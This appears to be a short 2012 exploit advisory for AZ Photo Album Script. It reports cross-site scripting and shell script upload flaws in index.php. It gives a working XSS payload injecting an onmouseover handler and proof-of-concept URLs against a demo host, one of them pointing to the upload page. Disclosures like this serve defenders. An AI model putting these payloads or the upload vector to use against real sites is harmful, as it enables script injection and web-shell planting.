AZ Photo Album Script Cross Site Scripting

🗓️ 20 May 2012 00:00:00Reported by Eyup CELIKType

packetstorm🔗 packetstormsecurity.com👁 23 Views

AZ Photo Album Script Cross Site Scripting vulnerability in index.ph

`# Exploit Title: AZ Photo Album Script Multiple Vulnerability  
# Date: 2012  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
XSS can be done using the command input and shell script upload  
  
Vulnerable Page:  
index.php (File Upload - XSS)  
  
  
Example:  
#" onmouseover=document.write("google.com") (For XSS)  
index.php/?gazpart=suggest (For File Upload)  
  
  
POC:  
http://www.php4script.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20  
  
http://www.php4script.com/demo/php-photo-album-script/index.php/?gazpart=suggest  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`

20 May 2012 00:00Current